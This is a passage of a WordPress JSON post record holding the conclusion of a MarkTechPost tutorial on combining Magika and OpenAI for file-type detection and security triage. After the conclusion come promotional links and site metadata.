tutorial.<\/p>\n<p>In conclusion, we saw how Magika and OpenAI work together to form a powerful AI-assisted file analysis system that is both technically robust and easy to understand. We use Magika to identify true file types, detect mismatches, inspect suspicious content, and analyze repositories or uploads at scale. At the same time, GPT helps us explain results, assess risks, and generate concise narratives for different audiences. This combination provides a workflow that is useful for developers and researchers, and also for security teams, forensic analysts, and technical decision-makers who need fast, accurate insight from file data. Overall, we create a practical end-to-end pipeline that shows how modern AI can improve file inspection, security triage, and automated reporting in a highly accessible Colab environment.<\/p>\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" \/>\n<p>Check out\u00a0the<strong>\u00a0<a href=\"https:\/\/github.com\/Marktechpost\/AI-Agents-Projects-Tutorials\/blob\/main\/Security\/magika_openai_file_detection_security_analysis_Marktechpost.ipynb\" target=\"_blank\" rel=\"noreferrer noopener\">Full Codes with Notebook here<\/a><\/strong>.<strong>\u00a0<\/strong>Also,\u00a0feel free to follow us on\u00a0<strong><a href=\"https:\/\/x.com\/intent\/follow?screen_name=marktechpost\" target=\"_blank\" rel=\"noreferrer noopener\"><mark>Twitter<\/mark><\/a><\/strong>\u00a0and don\u2019t forget to join our\u00a0<strong><a href=\"https:\/\/www.reddit.com\/r\/machinelearningnews\/\" target=\"_blank\" rel=\"noreferrer noopener\">130k+ ML SubReddit<\/a><\/strong>\u00a0and Subscribe to\u00a0<strong><a href=\"https:\/\/www.aidevsignals.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">our Newsletter<\/a><\/strong>. Wait! are you on telegram?\u00a0<strong><a href=\"https:\/\/t.me\/machinelearningresearchnews\" target=\"_blank\" rel=\"noreferrer noopener\">now you can join us on telegram as well.<\/a><\/strong><\/p>\n<p>Need to partner with us for promoting your GitHub Repo OR Hugging Face Page OR Product Release OR Webinar etc.?\u00a0<strong><a href=\"https:\/\/forms.gle\/MTNLpmJtsFA3VRVd9\" target=\"_blank\" rel=\"noreferrer noopener\"><mark>Connect with us<\/mark><\/a><\/strong><\/p>\n<p>The post <a href=\"https:\/\/www.marktechpost.com\/2026\/04\/19\/a-coding-implementation-to-build-an-ai-powered-file-type-detection-and-security-analysis-pipeline-with-magika-and-openai\/\">A Coding Implementation to Build an AI-Powered File Type Detection and Security Analysis Pipeline with Magika and OpenAI<\/a> appeared first on <a href=\"https:\/\/www.marktechpost.com\/\">MarkTechPost<\/a>.<\/p>","protected":false},"excerpt":{"rendered":"<p>In this tutorial, we build a w&hellip;<\/p>\n","protected":false},"author":1,"featured_media":29,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-761","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/posts\/761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=761"}],"version-history":[{"count":0,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/posts\/761\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/media\/29"}],"wp:attachment":[{"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}